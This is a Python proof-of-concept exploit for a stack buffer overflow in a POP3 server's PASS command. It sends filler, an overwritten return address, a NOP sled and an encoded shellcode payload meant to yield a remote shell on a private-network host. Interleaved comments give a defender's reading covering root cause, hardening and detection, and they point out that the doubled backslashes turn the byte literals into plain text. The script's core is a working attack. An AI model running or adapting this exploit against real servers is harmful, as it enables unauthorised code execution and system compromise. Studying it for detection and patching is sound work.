#By SxNade
#<https://github.com/SxNade>
#<https://sxnade.github.io>
import socket
import sys
import time
# Proof-of-concept for a stack buffer overflow reached through the POP3 PASS
# command. The script connects to a mail service on TCP/110, sends a normal
# USER line, then sends a PASS line whose argument is several thousand bytes
# long.
#
# Defender's reading of this listing:
#   * Root cause (inferred from the payload shape, not shown here): the server
#     presumably copies the PASS argument into a fixed-size stack buffer without
#     a length check. The durable fix is bounds checking in the server, or
#     replacing/retiring it.
#   * Hardening that breaks this pattern: DEP/NX (the payload runs from the
#     stack), ASLR on every loaded module (the overwrite uses one hard-coded
#     address), and stack cookies.
#   * Detection: a POP3 PASS argument far longer than any real password
#     (RFC 1939 limits each argument to 40 characters), long runs of a single
#     repeated byte such as 0x41, and 0x90 sleds in cleartext POP3 traffic.
#
# NOTE(review): as rendered on this page the backslashes in the literals below
# are doubled, so each literal holds the *text* of an escape sequence, not the
# byte it names. Treat the listing as illustrative.
print("[+] Initiating Buffer-overflow.....")
# Filler: 2606 "A" characters (0x41). Presumably the offset from the start of
# the vulnerable buffer to the saved return address. The offset is specific to
# one build of one server.
buffer = "A" * 2606
# Four-byte value placed immediately after the filler. The name suggests it is
# meant to overwrite the saved instruction pointer with a little-endian address;
# the listing does not show which module that address belongs to.
eip = "\\x8f\\x35\\x4a\\x5f"
# Sixteen repetitions of the 0x90 escape (x86 NOP), padding between the
# overwritten return address and the payload.
nops = "\\x90" * 16
# Opaque payload bytes appended after the NOP padding. Their function cannot be
# verified from this listing; the closing message implies they are meant to
# yield a shell. Do not execute bytes like these outside an isolated lab.
buf = b""
buf += b"\\xbb\\x95\\x02\\xec\\xa0\\xd9\\xe1\\xd9\\x74\\x24\\xf4\\x5a\\x31"
buf += b"\\xc9\\xb1\\x52\\x31\\x5a\\x12\\x83\\xea\\xfc\\x03\\xcf\\x0c\\x0e"
buf += b"\\x55\\x13\\xf8\\x4c\\x96\\xeb\\xf9\\x30\\x1e\\x0e\\xc8\\x70\\x44"
buf += b"\\x5b\\x7b\\x41\\x0e\\x09\\x70\\x2a\\x42\\xb9\\x03\\x5e\\x4b\\xce"
buf += b"\\xa4\\xd5\\xad\\xe1\\x35\\x45\\x8d\\x60\\xb6\\x94\\xc2\\x42\\x87"
buf += b"\\x56\\x17\\x83\\xc0\\x8b\\xda\\xd1\\x99\\xc0\\x49\\xc5\\xae\\x9d"
buf += b"\\x51\\x6e\\xfc\\x30\\xd2\\x93\\xb5\\x33\\xf3\\x02\\xcd\\x6d\\xd3"
buf += b"\\xa5\\x02\\x06\\x5a\\xbd\\x47\\x23\\x14\\x36\\xb3\\xdf\\xa7\\x9e"
buf += b"\\x8d\\x20\\x0b\\xdf\\x21\\xd3\\x55\\x18\\x85\\x0c\\x20\\x50\\xf5"
buf += b"\\xb1\\x33\\xa7\\x87\\x6d\\xb1\\x33\\x2f\\xe5\\x61\\x9f\\xd1\\x2a"
buf += b"\\xf7\\x54\\xdd\\x87\\x73\\x32\\xc2\\x16\\x57\\x49\\xfe\\x93\\x56"
buf += b"\\x9d\\x76\\xe7\\x7c\\x39\\xd2\\xb3\\x1d\\x18\\xbe\\x12\\x21\\x7a"
buf += b"\\x61\\xca\\x87\\xf1\\x8c\\x1f\\xba\\x58\\xd9\\xec\\xf7\\x62\\x19"
buf += b"\\x7b\\x8f\\x11\\x2b\\x24\\x3b\\xbd\\x07\\xad\\xe5\\x3a\\x67\\x84"
buf += b"\\x52\\xd4\\x96\\x27\\xa3\\xfd\\x5c\\x73\\xf3\\x95\\x75\\xfc\\x98"
buf += b"\\x65\\x79\\x29\\x0e\\x35\\xd5\\x82\\xef\\xe5\\x95\\x72\\x98\\xef"
buf += b"\\x19\\xac\\xb8\\x10\\xf0\\xc5\\x53\\xeb\\x93\\x29\\x0b\\xd8\\xe6"
buf += b"\\xc2\\x4e\\x1e\\xe8\\xa9\\xc6\\xf8\\x80\\xdd\\x8e\\x53\\x3d\\x47"
buf += b"\\x8b\\x2f\\xdc\\x88\\x01\\x4a\\xde\\x03\\xa6\\xab\\x91\\xe3\\xc3"
buf += b"\\xbf\\x46\\x04\\x9e\\x9d\\xc1\\x1b\\x34\\x89\\x8e\\x8e\\xd3\\x49"
buf += b"\\xd8\\xb2\\x4b\\x1e\\x8d\\x05\\x82\\xca\\x23\\x3f\\x3c\\xe8\\xb9"
buf += b"\\xd9\\x07\\xa8\\x65\\x1a\\x89\\x31\\xeb\\x26\\xad\\x21\\x35\\xa6"
buf += b"\\xe9\\x15\\xe9\\xf1\\xa7\\xc3\\x4f\\xa8\\x09\\xbd\\x19\\x07\\xc0"
buf += b"\\x29\\xdf\\x6b\\xd3\\x2f\\xe0\\xa1\\xa5\\xcf\\x51\\x1c\\xf0\\xf0"
buf += b"\\x5e\\xc8\\xf4\\x89\\x82\\x68\\xfa\\x40\\x07\\x88\\x19\\x40\\x72"
buf += b"\\x21\\x84\\x01\\x3f\\x2c\\x37\\xfc\\x7c\\x49\\xb4\\xf4\\xfc\\xae"
buf += b"\\xa4\\x7d\\xf8\\xeb\\x62\\x6e\\x70\\x63\\x07\\x90\\x27\\x84\\x02"
# Plain TCP connection to a hard-coded private (RFC 1918) address on port 110,
# the standard POP3 port. No TLS is used, so the whole exchange is visible to
# network sensors.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.40', 110))
# Read and discard up to 1024 bytes (the server greeting).
s.recv(1024)
# Ordinary USER command. The overflow is not triggered here.
s.send('USER hacker\\r\\n')
s.recv(1024)
# The oversized PASS argument: filler + return-address value + NOP padding +
# payload. This is the single request a length check or an IDS rule on POP3
# argument size would stop.
s.send('PASS ' + buffer + eip + nops + buf + '\\r\\n')
# QUIT is sent without reading the server's reply to PASS.
s.send('QUIT\\r\\n')
s.close()
# These messages are printed unconditionally. The script never checks whether
# the server accepted, rejected, or crashed on the PASS line.
print("[+] Exploit Completed")
print("\\n[+] Hopefully You Should Have a Shell Now!\\n")
time.sleep(1)